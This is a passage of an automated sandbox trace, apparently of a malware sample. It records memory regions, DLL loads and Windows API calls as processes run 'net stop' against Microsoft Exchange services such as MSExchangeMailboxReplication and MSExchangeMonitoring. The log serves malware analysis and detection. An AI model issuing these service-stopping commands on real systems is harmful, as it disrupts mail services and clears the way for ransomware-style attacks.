"bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11016 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11017 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11018 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11019 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11020 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11021 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11022 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11023 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11024 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11025 start_va = 0x7f270000 end_va = 0x7f36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f270000" filename = "" Region: id = 11026 start_va = 0x7f396000 end_va = 0x7f398fff entry_point = 0x0 region_type = private name = "private_0x000000007f396000" filename = "" Region: id = 11027 start_va = 0x540000 end_va = 0x543fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 11028 start_va = 0x760000 end_va = 0x762fff entry_point = 0x760000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11029 start_va = 0x810000 end_va = 0x841fff entry_point = 0x810000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 675 os_tid = 0xf5c [0138.060] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0138.060] __set_app_type (_Type=0x1) [0138.060] __p__fmode () returned 0x77ac4d6c [0138.060] __p__commode () returned 0x77ac5b1c [0138.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0138.061] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0138.061] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.061] GetConsoleOutputCP () returned 0x1b5 [0138.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0138.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.063] sprintf_s (in: _DstBuf=0x62fda0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0138.063] setlocale (category=0, locale=".437") returned="English_United States.437" [0138.065] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0138.065] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0138.065] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMailboxReplication" [0138.065] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x62fb48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0138.065] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x62fb3c | out: Buffer=0x62fb3c*=0x9580a8) returned 0x0 [0138.065] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x62fb40 | out: Buffer=0x62fb40*=0x958018) returned 0x0 [0138.065] __iob_func () returned 0x77ac1208 [0138.065] _fileno (_File=0x77ac1208) returned 0 [0138.065] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0138.065] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0138.065] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0138.065] _wcsicmp (_String1="config", _String2="stop") returned -16 [0138.065] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0138.065] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0138.065] _wcsicmp (_String1="file", _String2="stop") returned -13 [0138.065] _wcsicmp (_String1="files", _String2="stop") returned -13 [0138.065] _wcsicmp (_String1="group", _String2="stop") returned -12 [0138.065] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0138.065] _wcsicmp (_String1="help", _String2="stop") returned -11 [0138.065] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0138.065] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0138.065] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0138.065] _wcsicmp (_String1="session", _String2="stop") returned -15 [0138.065] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0138.065] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0138.065] _wcsicmp (_String1="share", _String2="stop") returned -12 [0138.065] _wcsicmp (_String1="start", _String2="stop") returned -14 [0138.065] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0138.065] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0138.065] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0138.065] _wcsicmp (_String1="accounts", _String2="MSExchangeMailboxReplication") returned -12 [0138.065] _wcsicmp (_String1="computer", _String2="MSExchangeMailboxReplication") returned -10 [0138.065] _wcsicmp (_String1="config", _String2="MSExchangeMailboxReplication") returned -10 [0138.065] _wcsicmp (_String1="continue", _String2="MSExchangeMailboxReplication") returned -10 [0138.065] _wcsicmp (_String1="cont", _String2="MSExchangeMailboxReplication") returned -10 [0138.065] _wcsicmp (_String1="file", _String2="MSExchangeMailboxReplication") returned -7 [0138.065] _wcsicmp (_String1="files", _String2="MSExchangeMailboxReplication") returned -7 [0138.065] _wcsicmp (_String1="group", _String2="MSExchangeMailboxReplication") returned -6 [0138.065] _wcsicmp (_String1="groups", _String2="MSExchangeMailboxReplication") returned -6 [0138.065] _wcsicmp (_String1="help", _String2="MSExchangeMailboxReplication") returned -5 [0138.065] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMailboxReplication") returned -5 [0138.065] _wcsicmp (_String1="localgroup", _String2="MSExchangeMailboxReplication") returned -1 [0138.065] _wcsicmp (_String1="pause", _String2="MSExchangeMailboxReplication") returned 3 [0138.065] _wcsicmp (_String1="session", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="sessions", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="sess", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="share", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="start", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="stats", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="statistics", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="stop", _String2="MSExchangeMailboxReplication") returned 6 [0138.065] _wcsicmp (_String1="time", _String2="MSExchangeMailboxReplication") returned 7 [0138.066] _wcsicmp (_String1="user", _String2="MSExchangeMailboxReplication") returned 8 [0138.066] _wcsicmp (_String1="users", _String2="MSExchangeMailboxReplication") returned 8 [0138.066] _wcsicmp (_String1="msg", _String2="MSExchangeMailboxReplication") returned 2 [0138.066] _wcsicmp (_String1="messenger", _String2="MSExchangeMailboxReplication") returned -14 [0138.066] _wcsicmp (_String1="receiver", _String2="MSExchangeMailboxReplication") returned 5 [0138.066] _wcsicmp (_String1="rcv", _String2="MSExchangeMailboxReplication") returned 5 [0138.066] _wcsicmp (_String1="netpopup", _String2="MSExchangeMailboxReplication") returned 1 [0138.066] _wcsicmp (_String1="redirector", _String2="MSExchangeMailboxReplication") returned 5 [0138.066] _wcsicmp (_String1="redir", _String2="MSExchangeMailboxReplication") returned 5 [0138.066] _wcsicmp (_String1="rdr", _String2="MSExchangeMailboxReplication") returned 5 [0138.066] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeMailboxReplication") returned 10 [0138.066] _wcsicmp (_String1="work", _String2="MSExchangeMailboxReplication") returned 10 [0138.066] _wcsicmp (_String1="wksta", _String2="MSExchangeMailboxReplication") returned 10 [0138.066] _wcsicmp (_String1="prdr", _String2="MSExchangeMailboxReplication") returned 3 [0138.066] _wcsicmp (_String1="devrdr", _String2="MSExchangeMailboxReplication") returned -9 [0138.066] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMailboxReplication") returned -1 [0138.066] _wcsicmp (_String1="server", _String2="MSExchangeMailboxReplication") returned 6 [0138.066] _wcsicmp (_String1="svr", _String2="MSExchangeMailboxReplication") returned 6 [0138.066] _wcsicmp (_String1="srv", _String2="MSExchangeMailboxReplication") returned 6 [0138.066] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMailboxReplication") returned -1 [0138.066] _wcsicmp (_String1="alerter", _String2="MSExchangeMailboxReplication") returned -12 [0138.066] _wcsicmp (_String1="netlogon", _String2="MSExchangeMailboxReplication") returned 1 [0138.066] _wcsupr (in: _String="MSExchangeMailboxReplication" | out: _String="MSEXCHANGEMAILBOXREPLICATION") returned="MSEXCHANGEMAILBOXREPLICATION" [0138.066] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x952650 [0138.068] GetServiceKeyNameW (in: hSCManager=0x952650, lpDisplayName="MSEXCHANGEMAILBOXREPLICATION", lpServiceName=0x10a8cb0, lpcchBuffer=0x62fab4 | out: lpServiceName="", lpcchBuffer=0x62fab4) returned 0 [0138.068] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 2 [0138.068] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMAILBOXREPLICATION") returned -14 [0138.068] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 5 [0138.068] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 5 [0138.068] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 5 [0138.068] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 5 [0138.068] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 5 [0138.068] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 10 [0138.068] _wcsicmp (_String1="work", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 10 [0138.068] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 10 [0138.068] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 3 [0138.068] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMAILBOXREPLICATION") returned -9 [0138.068] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMAILBOXREPLICATION") returned -1 [0138.068] _wcsicmp (_String1="server", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 6 [0138.068] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 6 [0138.068] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 6 [0138.068] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMAILBOXREPLICATION") returned -1 [0138.068] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMAILBOXREPLICATION") returned -12 [0138.069] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMAILBOXREPLICATION") returned 1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="WORKSTATION") returned -10 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="LanmanWorkstation") returned 1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="SERVER") returned -6 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="LanmanServer") returned 1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="BROWSER") returned 11 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="BROWSER") returned 11 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="MESSENGER") returned 14 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="MESSENGER") returned 14 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="NETRUN") returned -1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="NETRUN") returned -1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="SPOOLER") returned -6 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="SPOOLER") returned -6 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="ALERTER") returned 12 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="ALERTER") returned 12 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="NETLOGON") returned -1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="NETLOGON") returned -1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="NETPOPUP") returned -1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="NETPOPUP") returned -1 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="SQLSERVER") returned -6 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="SQLSERVER") returned -6 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="REPLICATOR") returned -5 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="REPLICATOR") returned -5 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="REMOTEBOOT") returned -5 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="REMOTEBOOT") returned -5 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="TIMESOURCE") returned -7 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="TIMESOURCE") returned -7 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="AFP") returned 12 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="AFP") returned 12 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="UPS") returned -8 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="UPS") returned -8 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="XACTSRV") returned -11 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="XACTSRV") returned -11 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="TCPIP") returned -7 [0138.069] _wcsicmp (_String1="MSEXCHANGEMAILBOXREPLICATION", _String2="TCPIP") returned -7 [0138.069] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x95b088 [0138.069] OpenServiceW (hSCManager=0x95b088, lpServiceName="MSEXCHANGEMAILBOXREPLICATION", dwDesiredAccess=0x84) returned 0x0 [0138.070] GetLastError () returned 0x424 [0138.070] CloseServiceHandle (hSCObject=0x95b088) returned 1 [0138.070] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0138.070] LoadLibraryW (lpLibFileName="NETMSG") returned 0x760000 [0138.070] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x760000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0138.071] GetFileType (hFile=0x40) returned 0x2 [0138.072] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x62f950 | out: lpMode=0x62f950) returned 1 [0138.072] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x62f95c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x62f95c*=0x1e) returned 1 [0138.072] GetFileType (hFile=0x40) returned 0x2 [0138.072] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x62f950 | out: lpMode=0x62f950) returned 1 [0138.072] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x62f95c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x62f95c*=0x2) returned 1 [0138.072] _ultow (in: _Dest=0x889, _Radix=6486384 | out: _Dest=0x889) returned="2185" [0138.072] FormatMessageW (in: dwFlags=0x2800, lpSource=0x760000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0138.073] GetFileType (hFile=0x40) returned 0x2 [0138.073] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x62f940 | out: lpMode=0x62f940) returned 1 [0138.073] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x62f94c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x62f94c*=0x34) returned 1 [0138.073] GetFileType (hFile=0x40) returned 0x2 [0138.073] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x62f940 | out: lpMode=0x62f940) returned 1 [0138.073] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x62f94c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x62f94c*=0x2) returned 1 [0138.073] NetApiBufferFree (Buffer=0x9580a8) returned 0x0 [0138.073] NetApiBufferFree (Buffer=0x958018) returned 0x0 [0138.073] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMailboxReplication" [0138.073] exit (_Code=2) Thread: id = 676 os_tid = 0xf94 Process: id = "225" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x13c58000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeMonitoring" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11030 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11031 start_va = 0x500000 end_va = 0x44fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 11032 start_va = 0x4500000 end_va = 0x451ffff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 11033 start_va = 0x4520000 end_va = 0x4520fff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 11034 start_va = 0x4530000 end_va = 0x4543fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004530000" filename = "" Region: id = 11035 start_va = 0x4550000 end_va = 0x458ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 11036 start_va = 0x4590000 end_va = 0x468ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 11037 start_va = 0x4690000 end_va = 0x4693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004690000" filename = "" Region: id = 11038 start_va = 0x46a0000 end_va = 0x46a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 11039 start_va = 0x46b0000 end_va = 0x46b1fff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 11040 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11041 start_va = 0x7e6e0000 end_va = 0x7e702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6e0000" filename = "" Region: id = 11042 start_va = 0x7e704000 end_va = 0x7e704fff entry_point = 0x0 region_type = private name = "private_0x000000007e704000" filename = "" Region: id = 11043 start_va = 0x7e70c000 end_va = 0x7e70efff entry_point = 0x0 region_type = private name = "private_0x000000007e70c000" filename = "" Region: id = 11044 start_va = 0x7e70f000 end_va = 0x7e70ffff entry_point = 0x0 region_type = private name = "private_0x000000007e70f000" filename = "" Region: id = 11045 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11046 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11047 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11048 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11049 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11050 start_va = 0x4800000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 11051 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11052 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11053 start_va = 0x49b0000 end_va = 0x4aaffff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 11054 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11095 start_va = 0x4500000 end_va = 0x450ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004500000" filename = "" Region: id = 11096 start_va = 0x46c0000 end_va = 0x477dfff entry_point = 0x46c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11097 start_va = 0x4780000 end_va = 0x47bffff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 11098 start_va = 0x4810000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 11099 start_va = 0x4ca0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 11100 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11101 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11102 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11103 start_va = 0x7e5e0000 end_va = 0x7e6dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5e0000" filename = "" Region: id = 11104 start_va = 0x7e709000 end_va = 0x7e70bfff entry_point = 0x0 region_type = private name = "private_0x000000007e709000" filename = "" Region: id = 11105 start_va = 0x4510000 end_va = 0x4513fff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 11106 start_va = 0x4520000 end_va = 0x4523fff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 11107 start_va = 0x4cb0000 end_va = 0x4fe6fff entry_point = 0x4cb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 677 os_tid = 0xfec [0138.232] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0138.232] __set_app_type (_Type=0x1) [0138.232] __p__fmode () returned 0x77ac4d6c [0138.232] __p__commode () returned 0x77ac5b1c [0138.232] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0138.233] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0138.233] GetCurrentThreadId () returned 0xfec [0138.233] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfec) returned 0x84 [0138.233] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0138.233] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0138.233] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.235] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.235] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x468f780 | out: phkResult=0x468f780*=0x0) returned 0x2 [0138.235] VirtualQuery (in: lpAddress=0x468f787, lpBuffer=0x468f738, dwLength=0x1c | out: lpBuffer=0x468f738*(BaseAddress=0x468f000, AllocationBase=0x4590000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.236] VirtualQuery (in: lpAddress=0x4590000, lpBuffer=0x468f738, dwLength=0x1c | out: lpBuffer=0x468f738*(BaseAddress=0x4590000, AllocationBase=0x4590000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0138.236] VirtualQuery (in: lpAddress=0x4591000, lpBuffer=0x468f738, dwLength=0x1c | out: lpBuffer=0x468f738*(BaseAddress=0x4591000, 